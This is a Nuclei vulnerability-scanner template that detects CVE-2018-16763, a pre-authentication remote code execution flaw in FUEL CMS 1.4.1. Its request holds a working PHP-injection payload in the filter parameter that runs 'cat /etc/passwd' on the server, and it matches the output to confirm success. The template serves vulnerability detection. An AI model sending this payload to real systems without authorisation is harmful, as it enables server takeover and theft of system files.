nuclei-templates/cves/2018/CVE-2018-16763.yaml

33 lines
969 B
YAML

id: CVE-2018-16763
info:
name: fuelCMS 1.4.1 - Remote Code Execution
author: pikpikcu
severity: critical
description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.
reference:
- https://www.exploit-db.com/exploits/47138
- https://www.getfuelcms.com/
- https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-16763
cwe-id: CWE-74
tags: cve,cve2018,fuelcms,rce
requests:
- raw:
- |
GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"